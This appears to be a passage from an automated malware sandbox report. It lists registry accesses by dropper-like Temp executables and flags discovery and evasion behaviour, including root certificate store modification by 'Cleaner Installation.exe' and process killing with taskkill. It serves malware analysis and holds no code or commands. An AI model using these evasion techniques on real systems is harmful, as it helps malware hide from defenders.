Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\setup.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\setup_2.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\rundll32.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\DownFlSetup110.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\mZkzkgccxHSnguzkDO\QTborv N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\setup_2.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\e8a12a95fa\sqtvvs.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\is-7938F.tmp\setup_2.tmp N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\mshta.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\rundll32.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\Firstoffer.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\sfx_123_206.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\reg.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\control.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\Cleaner Installation.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\lijun-game.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\Cleaner Installation.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\4MCYlgNAW.eXE N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\schtasks.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\syswow64\MsiExec.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\mshta.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\BearVpn 3.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\taskkill.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\mshta.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A

System Time Discovery

discovery
Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\Cleaner Installation.exe N/A

Checks SCSI registry key(s)

Description Indicator Process Target
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\Device Parameters C:\Windows\system32\vssvc.exe N/A
Key queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\Device Parameters C:\Windows\system32\vssvc.exe N/A
Key created \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\Device Parameters\Partmgr C:\Windows\system32\vssvc.exe N/A
Set value (data) \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\Device Parameters\Partmgr\PartitionTableCache = 0000000004000000e6cf55ff94a5976e0000000000000000000000000000000000000000000000000000000000000000000000000000000000001000000000000000c01200000000ffffffff000000002701010000080000e6cf55ff0000000000001000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000d01200000000000020ed3a000000ffffffff000000000700010000680900e6cf55ff000000000000d012000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000f0ff3a0000000000000005000000ffffffff000000000700010000f87f1de6cf55ff000000000000f0ff3a00000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000ffffffff000000000000000000000000e6cf55ff00000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000 C:\Windows\system32\vssvc.exe N/A
Set value (data) \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\Device Parameters\Partmgr\SnapshotDataCache = 534e41505041525401000000700000008ec7416a0000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000 C:\Windows\system32\vssvc.exe N/A

Kills process with taskkill

evasion
Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\taskkill.exe N/A
N/A N/A C:\Windows\SysWOW64\taskkill.exe N/A

Modifies system certificate store

evasion spyware trojan
Description Indicator Process Target
Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\4EFC31460C619ECAE59C1BCE2C008036D94C84B8\Blob = 1900000001000000100000005d1b8ff2c30f63f5b536edd400f7f9b40300000001000000140000004efc31460c619ecae59c1bce2c008036d94c84b809000000010000000c000000300a06082b060105050703031d00000001000000100000005467b0adde8d858e30ee517b1a19ecd91400000001000000140000001f00bf46800afc7839b7a5b443d95650bbce963b53000000010000001f000000301d301b060567810c010330123010060a2b0601040182373c0101030200c06200000001000000200000007b9d553e1c92cb6e8803e137f4f287d4363757f5d44b37d52f9fca22fb97df860b000000010000004200000047006c006f00620061006c005300690067006e00200043006f006400650020005300690067006e0069006e006700200052006f006f007400200052003400350000000f0000000100000030000000c130bba37b8b350e89fd5ed76b4f78777feee220d3b9e729042bef6af46e8e4c1b252e32b3080c681bc9a8a1afdd0a3c200000000100000076050000308205723082035aa00302010202107653feac75464893f5e5d74a483a4ef8300d06092a864886f70d01010c05003053310b300906035504061302424531193017060355040a1310476c6f62616c5369676e206e762d73613129302706035504031320476c6f62616c5369676e20436f6465205369676e696e6720526f6f7420523435301e170d3230303331383030303030305a170d3435303331383030303030305a3053310b300906035504061302424531193017060355040a1310476c6f62616c5369676e206e762d73613129302706035504031320476c6f62616c5369676e20436f6465205369676e696e6720526f6f742052343530820222300d06092a864886f70d01010105000382020f003082020a0282020100b62dc530dd7ae8ab903d0372b03a4b991661b2e5ffa5671d371ce57eec9383aa84f5a3439b98458ab863575d9b00880425e9f868924b82d84bc94a03f3a87f6a8f8a6127bda144d0fdf53f22c2a34f918db305b22882915dfb5988050b9706c298f82ca73324ee503a41ccf0a0b07b1d4dd2a8583896e9dff91b91bb8b102cd2c7431da20974a180af7be6330a0c596b8ebcf4ab5a977b7fae55fb84f080fe844cd7e2babdc475a16fbd61107444b29807e274abff68dc6c263ee91fe5e00487ad30d30c8d037c55b816705c24782025eb676788abba4e34986b7011de38cad4bea1c09ce1df1e0201d83be1674384b6cffc74b72f84a3bfba09373d676cb1455c1961ab4183f5ac1deb770d464773cebfbd9595ed9d2b8810fefa58e8a757e1b3cfa85ae907259b12c49e80723d93dc8c94df3b44e62680fcd2c303f08c0cd245d62ee78f989ee604ee426e677e42167162e704f960c664a1b69c81214e2bc66d689486c699747367317a91f2d48c796e7ca6bb7e466f4dc585122bcf9a224408a88537ce07615706171224c0c43173a1983557477e103a45d92da4519098a9a00737c4651aaa1c6b1677f7a797ec3f1930996f31fbea40b2e7d2c4fac9d0f050767459fa8d6d1732bef8e97e03f4e787759ad44a912c850313022b4280f2896a36cfc84ca0ce9ef8cb8dad16a7d3ded59b18a7c6923af18263f12e0e2464df0203010001a3423040300e0603551d0f0101ff040403020186300f0603551d130101ff040530030101ff301d0603551d0e041604141f00bf46800afc7839b7a5b443d95650bbce963b300d06092a864886f70d01010c050003820201005e2bba749734445f764828408493ee016ee9a1b3d68025e67be4bc09913d0ffc76add7d43020bb8f60d091d61cf29cef781a2b943202c12496525202d0f3d1fcf29b396e99e11f8e43417d9a1e5bc95d9a84fc26e687f3747226ada41bd93d3b6a52a03c091e2f1e7bb333b445c7f7acb1af9360ad76aeb8b21578eb836aebffdb46ab24e5ee02fa901f59c02f5dd6b75da45c10b77253f8414eccfa781a254acafe85624361c3b437aa81d2f4d63a0fbd8d597e3047de2b6be72150335fd4679bd4b8679f3c279903ff85438e7312ca20cde861d5b166dc17d6396d0fdbcf2337a182894e1c6b3fd6a0cdaa079d3e4226aad70ceefa47bf1a527ed17581d3c98a62176d4f88a021a0263eaf6dd962301fe99828ae6e8dd58e4c726693808d2ae355c760679042565c22510fb3dc4e39ee4dddd91d7810543b6ed0976f03b51eb22373c612b29a64d0fc958524a8ffdfa1b0dc9140aedf0933abb9dd92b7f1cc91743b69eb67971b90bfe7c7a06f71bb57bfb78f5aed7a406a16cd80842d2fe102d4249443b315fc0c2b1bfd716ffccbbc75173a5e83d2c9b32f1bd59c8d7f54fe7e7ee456a387a79de1595294418f6d5bbe86959aff1a76dd40d2514a70b41f336323773fec271e59e40887ed34824a0f3ffea01dc1f56773458678f4aa29e92787c619dbc61314c33949874da097e06513f59d7756e9dab358c73af2c0cd82 C:\Users\Admin\AppData\Local\Temp\Cleaner Installation.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\2B8F1B57330DBBA2D07A6C51F70EE90DDAB9AD8E C:\Users\Admin\AppData\Local\Temp\Cleaner Installation.exe N/A
Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\2B8F1B57330DBBA2D07A6C51F70EE90DDAB9AD8E\Blob = 0400000001000000100000001bfe69d191b71933a372a80fe155e5b50f000000010000003000000066b764a96581128168cf208e374dda479d54e311f32457f4aee0dbd2a6c8d171d531289e1cd22bfdbbd4cfd979625483090000000100000054000000305206082b0601050507030206082b06010505070303060a2b0601040182370a030406082b0601050507030406082b0601050507030606082b0601050507030706082b0601050507030106082b0601050507030853000000010000004300000030413022060c2b06010401b231010201050130123010060a2b0601040182373c0101030200c0301b060567810c010330123010060a2b0601040182373c0101030200c0620000000100000020000000e793c9b02fd8aa13e21c31228accb08119643b749c898964b1746d46c3d4cbd21400000001000000140000005379bf5aaa2b4acf5480e1d89bc09df2b20366cb1d0000000100000010000000885010358d29a38f059b028559c95f900b00000001000000100000005300650063007400690067006f0000000300000001000000140000002b8f1b57330dbba2d07a6c51f70ee90ddab9ad8e190000000100000010000000ea6089055218053dd01e37e1d806eedf2000000001000000e2050000308205de308203c6a003020102021001fd6d30fca3ca51a81bbc640e35032d300d06092a864886f70d01010c0500308188310b3009060355040613025553311330110603550408130a4e6577204a6572736579311430120603550407130b4a65727365792043697479311e301c060355040a131554686520555345525452555354204e6574776f726b312e302c06035504031325555345525472757374205253412043657274696669636174696f6e20417574686f72697479301e170d3130303230313030303030305a170d3338303131383233353935395a308188310b3009060355040613025553311330110603550408130a4e6577204a6572736579311430120603550407130b4a65727365792043697479311e301c060355040a131554686520555345525452555354204e6574776f726b312e302c06035504031325555345525472757374205253412043657274696669636174696f6e20417574686f7269747930820222300d06092a864886f70d01010105000382020f003082020a028202010080126517360ec3db08b3d0ac570d76edcd27d34cad508361e2aa204d092d6409dcce899fcc3da9ecf6cfc1dcf1d3b1d67b3728112b47da39c6bc3a19b45fa6bd7d9da36342b676f2a93b2b91f8e26fd0ec162090093ee2e874c918b491d46264db7fa306f188186a90223cbcfe13f087147bf6e41f8ed4e451c61167460851cb8614543fbc33fe7e6c9cff169d18bd518e35a6a766c87267db2166b1d49b7803c0503ae8ccf0dcbc9e4cfeaf0596351f575ab7ffcef93db72cb6f654ddc8e7123a4dae4c8ab75c9ab4b7203dca7f2234ae7e3b68660144e7014e46539b3360f794be5337907343f332c353efdbaafe744e69c76b8c6093dec4c70cdfe132aecc933b517895678bee3d56fe0cd0690f1b0ff325266b336df76e47fa7343e57e0ea566b1297c3284635589c40dc19354301913acd37d37a7eb5d3a6c355cdb41d712daa9490bdfd8808a0993628eb566cf2588cd84b8b13fa4390fd9029eeb124c957cf36b05a95e1683ccb867e2e8139dcc5b82d34cb3ed5bffdee573ac233b2d00bf3555740949d849581a7f9236e651920ef3267d1c4d17bcc9ec4326d0bf415f40a94444f499e757879e501f5754a83efd74632fb1506509e658422e431a4cb4f0254759fa041e93d426464a5081b2debe78b7fc6715e1c957841e0f63d6e962bad65f552eea5cc62808042539b80e2ba9f24c971c073f0d52f5edef2f820f0203010001a3423040301d0603551d0e041604145379bf5aaa2b4acf5480e1d89bc09df2b20366cb300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff300d06092a864886f70d01010c050003820201005cd47c0dcff7017d4199650c73c5529fcbf8cf99067f1bda43159f9e0255579614f1523c27879428ed1f3a0137a276fc5350c0849bc66b4eba8c214fa28e556291f36915d8bc88e3c4aa0bfdefa8e94b552a06206d55782919ee5f305c4b241155ff249a6e5e2a2bee0b4d9f7ff70138941495430709fb60a9ee1cab128ca09a5ea7986a596d8b3f08fbc8d145af18156490120f73282ec5e2244efc58ecf0f445fe22b3eb2f8ed2d9456105c1976fa876728f8b8c36afbf0d05ce718de6a66f1f6ca67162c5d8d083720cf16711890c9c134c7234dfbcd571dfaa71dde1b96c8c3c125d65dabd5712b6436bffe5de4d661151cf99aeec17b6e871918cde49fedd3571a21527941ccf61e326bb6fa36725215de6dd1d0b2e681b3b82afec836785d4985174b1b9998089ff7f78195c794a602e9240ae4c372a2cc9c762c80e5df7365bcae0252501b4dd1a079c77003fd0dcd5ec3dd4fabb3fcc85d66f7fa92ddfb902f7f5979ab535dac367b0874aa9289e238eff5c276be1b04ff307ee002ed45987cb524195eaf447d7ee6441557c8d590295dd629dc2b9ee5a287484a59bb790c70c07dff589367432d628c1b0b00be09c4cc31cd6fce369b54746812fa282abd3634470c48dff2d33baad8f7bb57088ae3e19cf4028d8fcc890bb5d9922f552e658c51f883143ee881dd7c68e3c436a1da718de7d3d16f162f9ca90a8fd C:\Users\Admin\AppData\Local\Temp\Cleaner Installation.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\4EFC31460C619ECAE59C1BCE2C008036D94C84B8 C:\Users\Admin\AppData\Local\Temp\Cleaner Installation.exe N/A
Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\4EFC31460C619ECAE59C1BCE2C008036D94C84B8\Blob = 040000000100000010000000e94fb54871208c00df70f708ac47085b0f0000000100000030000000c130bba37b8b350e89fd5ed76b4f78777feee220d3b9e729042bef6af46e8e4c1b252e32b3080c681bc9a8a1afdd0a3c0b000000010000004200000047006c006f00620061006c005300690067006e00200043006f006400650020005300690067006e0069006e006700200052006f006f007400200052003400350000006200000001000000200000007b9d553e1c92cb6e8803e137f4f287d4363757f5d44b37d52f9fca22fb97df8653000000010000001f000000301d301b060567810c010330123010060a2b0601040182373c0101030200c01400000001000000140000001f00bf46800afc7839b7a5b443d95650bbce963b1d00000001000000100000005467b0adde8d858e30ee517b1a19ecd909000000010000000c000000300a06082b060105050703030300000001000000140000004efc31460c619ecae59c1bce2c008036d94c84b81900000001000000100000005d1b8ff2c30f63f5b536edd400f7f9b4200000000100000076050000308205723082035aa00302010202107653feac75464893f5e5d74a483a4ef8300d06092a864886f70d01010c05003053310b300906035504061302424531193017060355040a1310476c6f62616c5369676e206e762d73613129302706035504031320476c6f62616c5369676e20436f6465205369676e696e6720526f6f7420523435301e170d3230303331383030303030305a170d3435303331383030303030305a3053310b300906035504061302424531193017060355040a1310476c6f62616c5369676e206e762d73613129302706035504031320476c6f62616c5369676e20436f6465205369676e696e6720526f6f742052343530820222300d06092a864886f70d01010105000382020f003082020a0282020100b62dc530dd7ae8ab903d0372b03a4b991661b2e5ffa5671d371ce57eec9383aa84f5a3439b98458ab863575d9b00880425e9f868924b82d84bc94a03f3a87f6a8f8a6127bda144d0fdf53f22c2a34f918db305b22882915dfb5988050b9706c298f82ca73324ee503a41ccf0a0b07b1d4dd2a8583896e9dff91b91bb8b102cd2c7431da20974a180af7be6330a0c596b8ebcf4ab5a977b7fae55fb84f080fe844cd7e2babdc475a16fbd61107444b29807e274abff68dc6c263ee91fe5e00487ad30d30c8d037c55b816705c24782025eb676788abba4e34986b7011de38cad4bea1c09ce1df1e0201d83be1674384b6cffc74b72f84a3bfba09373d676cb1455c1961ab4183f5ac1deb770d464773cebfbd9595ed9d2b8810fefa58e8a757e1b3cfa85ae907259b12c49e80723d93dc8c94df3b44e62680fcd2c303f08c0cd245d62ee78f989ee604ee426e677e42167162e704f960c664a1b69c81214e2bc66d689486c699747367317a91f2d48c796e7ca6bb7e466f4dc585122bcf9a224408a88537ce07615706171224c0c43173a1983557477e103a45d92da4519098a9a00737c4651aaa1c6b1677f7a797ec3f1930996f31fbea40b2e7d2c4fac9d0f050767459fa8d6d1732bef8e97e03f4e787759ad44a912c850313022b4280f2896a36cfc84ca0ce9ef8cb8dad16a7d3ded59b18a7c6923af18263f12e0e2464df0203010001a3423040300e0603551d0f0101ff040403020186300f0603551d130101ff040530030101ff301d0603551d0e041604141f00bf46800afc7839b7a5b443d95650bbce963b300d06092a864886f70d01010c050003820201005e2bba749734445f764828408493ee016ee9a1b3d68025e67be4bc09913d0ffc76add7d43020bb8f60d091d61cf29cef781a2b943202c12496525202d0f3d1fcf29b396e99e11f8e43417d9a1e5bc95d9a84fc26e687f3747226ada41bd93d3b6a52a03c091e2f1e7bb333b445c7f7acb1af9360ad76aeb8b21578eb836aebffdb46ab24e5ee02fa901f59c02f5dd6b75da45c10b77253f8414eccfa781a254acafe85624361c3b437aa81d2f4d63a0fbd8d597e3047de2b6be72150335fd4679bd4b8679f3c279903ff85438e7312ca20cde861d5b166dc17d6396d0fdbcf2337a182894e1c6b3fd6a0cdaa079d3e4226aad70ceefa47bf1a527ed17581d3c98a62176d4f88a021a0263eaf6dd962301fe99828ae6e8dd58e4c726693808d2ae355c760679042565c22510fb3dc4e39ee4dddd91d7810543b6ed0976f03b51eb22373c612b29a64d0fc958524a8ffdfa1b0dc9140aedf0933abb9dd92b7f1cc91743b69eb67971b90bfe7c7a06f71bb57bfb78f5aed7a406a16cd80842d2fe102d4249443b315fc0c2b1bfd716ffccbbc75173a5e83d2c9b32f1bd59c8d7f54fe7e7ee456a387a79de1595294418f6d5bbe86959aff1a76dd40d2514a70b41f336323773fec271e59e40887ed34824a0f3ffea01dc1f56773458678f4aa29e92787c619dbc61314c33949874da097e06513f59d7756e9dab358c73af2c0cd82 C:\Users\Admin\AppData\Local\Temp\Cleaner Installation.exe N/A
Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\4EFC31460C619ECAE59C1BCE2C008036D94C84B8\Blob = 5c0000000100000004000000001000001900000001000000100000005d1b8ff2c30f63f5b536edd400f7f9b40300000001000000140000004efc31460c619ecae59c1bce2c008036d94c84b809000000010000000c000000300a06082b060105050703031d00000001000000100000005467b0adde8d858e30ee517b1a19ecd91400000001000000140000001f00bf46800afc7839b7a5b443d95650bbce963b53000000010000001f000000301d301b060567810c010330123010060a2b0601040182373c0101030200c06200000001000000200000007b9d553e1c92cb6e8803e137f4f287d4363757f5d44b37d52f9fca22fb97df860b000000010000004200000047006c006f00620061006c005300690067006e00200043006f006400650020005300690067006e0069006e006700200052006f006f007400200052003400350000000f0000000100000030000000c130bba37b8b350e89fd5ed76b4f78777feee220d3b9e729042bef6af46e8e4c1b252e32b3080c681bc9a8a1afdd0a3c040000000100000010000000e94fb54871208c00df70f708ac47085b200000000100000076050000308205723082035aa00302010202107653feac75464893f5e5d74a483a4ef8300d06092a864886f70d01010c05003053310b300906035504061302424531193017060355040a1310476c6f62616c5369676e206e762d73613129302706035504031320476c6f62616c5369676e20436f6465205369676e696e6720526f6f7420523435301e170d3230303331383030303030305a170d3435303331383030303030305a3053310b300906035504061302424531193017060355040a1310476c6f62616c5369676e206e762d73613129302706035504031320476c6f62616c5369676e20436f6465205369676e696e6720526f6f742052343530820222300d06092a864886f70d01010105000382020f003082020a0282020100b62dc530dd7ae8ab903d0372b03a4b991661b2e5ffa5671d371ce57eec9383aa84f5a3439b98458ab863575d9b00880425e9f868924b82d84bc94a03f3a87f6a8f8a6127bda144d0fdf53f22c2a34f918db305b22882915dfb5988050b9706c298f82ca73324ee503a41ccf0a0b07b1d4dd2a8583896e9dff91b91bb8b102cd2c7431da20974a180af7be6330a0c596b8ebcf4ab5a977b7fae55fb84f080fe844cd7e2babdc475a16fbd61107444b29807e274abff68dc6c263ee91fe5e00487ad30d30c8d037c55b816705c24782025eb676788abba4e34986b7011de38cad4bea1c09ce1df1e0201d83be1674384b6cffc74b72f84a3bfba09373d676cb1455c1961ab4183f5ac1deb770d464773cebfbd9595ed9d2b8810fefa58e8a757e1b3cfa85ae907259b12c49e80723d93dc8c94df3b44e62680fcd2c303f08c0cd245d62ee78f989ee604ee426e677e42167162e704f960c664a1b69c81214e2bc66d689486c699747367317a91f2d48c796e7ca6bb7e466f4dc585122bcf9a224408a88537ce07615706171224c0c43173a1983557477e103a45d92da4519098a9a00737c4651aaa1c6b1677f7a797ec3f1930996f31fbea40b2e7d2c4fac9d0f050767459fa8d6d1732bef8e97e03f4e787759ad44a912c850313022b4280f2896a36cfc84ca0ce9ef8cb8dad16a7d3ded59b18a7c6923af18263f12e0e2464df0203010001a3423040300e0603551d0f0101ff040403020186300f0603551d130101ff040530030101ff301d0603551d0e041604141f00bf46800afc7839b7a5b443d95650bbce963b300d06092a864886f70d01010c050003820201005e2bba749734445f764828408493ee016ee9a1b3d68025e67be4bc09913d0ffc76add7d43020bb8f60d091d61cf29cef781a2b943202c12496525202d0f3d1fcf29b396e99e11f8e43417d9a1e5bc95d9a84fc26e687f3747226ada41bd93d3b6a52a03c091e2f1e7bb333b445c7f7acb1af9360ad76aeb8b21578eb836aebffdb46ab24e5ee02fa901f59c02f5dd6b75da45c10b77253f8414eccfa781a254acafe85624361c3b437aa81d2f4d63a0fbd8d597e3047de2b6be72150335fd4679bd4b8679f3c279903ff85438e7312ca20cde861d5b166dc17d6396d0fdbcf2337a182894e1c6b3fd6a0cdaa079d3e4226aad70ceefa47bf1a527ed17581d3c98a62176d4f88a021a0263eaf6dd962301fe99828ae6e8dd58e4c726693808d2ae355c760679042565c22510fb3dc4e39ee4dddd91d7810543b6ed0976f03b51eb22373c612b29a64d0fc958524a8ffdfa1b0dc9140aedf0933abb9dd92b7f1cc91743b69eb67971b90bfe7c7a06f71bb57bfb78f5aed7a406a16cd80842d2fe102d4249443b315fc0c2b1bfd716ffccbbc75173a5e83d2c9b32f1bd59c8d7f54fe7e7ee456a387a79de1595294418f6d5bbe86959aff1a76dd40d2514a70b41f336323773fec271e59e40887ed34824a0f3ffea01dc1f56773458678f4aa29e92787c619dbc61314c33949874da097e06513f59d7756e9dab358c73af2c0cd82 C:\Users\Admin\AppData\Local\Temp\Cleaner Installation.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\4EFC31460C619ECAE59C1BCE2C008036D94C84B8 C:\Users\Admin\AppData\Local\Temp\Cleaner Installation.exe N/A
Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\4EFC31460C619ECAE59C1BCE2C008036D94C84B8\Blob = 0f0000000100000030000000c130bba37b8b350e89fd5ed76b4f78777feee220d3b9e729042bef6af46e8e4c1b252e32b3080c681bc9a8a1afdd0a3c0b000000010000004200000047006c006f00620061006c005300690067006e00200043006f006400650020005300690067006e0069006e006700200052006f006f007400200052003400350000006200000001000000200000007b9d553e1c92cb6e8803e137f4f287d4363757f5d44b37d52f9fca22fb97df8653000000010000001f000000301d301b060567810c010330123010060a2b0601040182373c0101030200c01400000001000000140000001f00bf46800afc7839b7a5b443d95650bbce963b1d00000001000000100000005467b0adde8d858e30ee517b1a19ecd909000000010000000c000000300a06082b060105050703030300000001000000140000004efc31460c619ecae59c1bce2c008036d94c84b8200000000100000076050000308205723082035aa00302010202107653feac75464893f5e5d74a483a4ef8300d06092a864886f70d01010c05003053310b300906035504061302424531193017060355040a1310476c6f62616c5369676e206e762d73613129302706035504031320476c6f62616c5369676e20436f6465205369676e696e6720526f6f7420523435301e170d3230303331383030303030305a170d3435303331383030303030305a3053310b300906035504061302424531193017060355040a1310476c6f62616c5369676e206e762d73613129302706035504031320476c6f62616c5369676e20436f6465205369676e696e6720526f6f742052343530820222300d06092a864886f70d01010105000382020f003082020a0282020100b62dc530dd7ae8ab903d0372b03a4b991661b2e5ffa5671d371ce57eec9383aa84f5a3439b98458ab863575d9b00880425e9f868924b82d84bc94a03f3a87f6a8f8a6127bda144d0fdf53f22c2a34f918db305b22882915dfb5988050b9706c298f82ca73324ee503a41ccf0a0b07b1d4dd2a8583896e9dff91b91bb8b102cd2c7431da20974a180af7be6330a0c596b8ebcf4ab5a977b7fae55fb84f080fe844cd7e2babdc475a16fbd61107444b29807e274abff68dc6c263ee91fe5e00487ad30d30c8d037c55b816705c24782025eb676788abba4e34986b7011de38cad4bea1c09ce1df1e0201d83be1674384b6cffc74b72f84a3bfba09373d676cb1455c1961ab4183f5ac1deb770d464773cebfbd9595ed9d2b8810fefa58e8a757e1b3cfa85ae907259b12c49e80723d93dc8c94df3b44e62680fcd2c303f08c0cd245d62ee78f989ee604ee426e677e42167162e704f960c664a1b69c81214e2bc66d689486c699747367317a91f2d48c796e7ca6bb7e466f4dc585122bcf9a224408a88537ce07615706171224c0c43173a1983557477e103a45d92da4519098a9a00737c4651aaa1c6b1677f7a797ec3f1930996f31fbea40b2e7d2c4fac9d0f050767459fa8d6d1732bef8e97e03f4e787759ad44a912c850313022b4280f2896a36cfc84ca0ce9ef8cb8dad16a7d3ded59b18a7c6923af18263f12e0e2464df0203010001a3423040300e0603551d0f0101ff040403020186300f0603551d130101ff040530030101ff301d0603551d0e041604141f00bf46800afc7839b7a5b443d95650bbce963b300d06092a864886f70d01010c050003820201005e2bba749734445f764828408493ee016ee9a1b3d68025e67be4bc09913d0ffc76add7d43020bb8f60d091d61cf29cef781a2b943202c12496525202d0f3d1fcf29b396e99e11f8e43417d9a1e5bc95d9a84fc26e687f3747226ada41bd93d3b6a52a03c091e2f1e7bb333b445c7f7acb1af9360ad76aeb8b21578eb836aebffdb46ab24e5ee02fa901f59c02f5dd6b75da45c10b77253f8414eccfa781a254acafe85624361c3b437aa81d2f4d63a0fbd8d597e3047de2b6be72150335fd4679bd4b8679f3c279903ff85438e7312ca20cde861d5b166dc17d6396d0fdbcf2337a182894e1c6b3fd6a0cdaa079d3e4226aad70ceefa47bf1a527ed17581d3c98a62176d4f88a021a0263eaf6dd962301fe99828ae6e8dd58e4c726693808d2ae355c760679042565c22510fb3dc4e39ee4dddd91d7810543b6ed0976f03b51eb22373c612b29a64d0fc958524a8ffdfa1b0dc9140aedf0933abb9dd92b7f1cc91743b69eb67971b90bfe7c7a06f71bb57bfb78f5aed7a406a16cd80842d2fe102d4249443b315fc0c2b1bfd716ffccbbc75173a5e83d2c9b32f1bd59c8d7f54fe7e7ee456a387a79de1595294418f6d5bbe86959aff1a76dd40d2514a70b41f336323773fec271e59e40887ed34824a0f3ffea01dc1f56773458678f4aa29e92787c619dbc61314c33949874da097e06513f59d7756e9dab358c73af2c0cd82 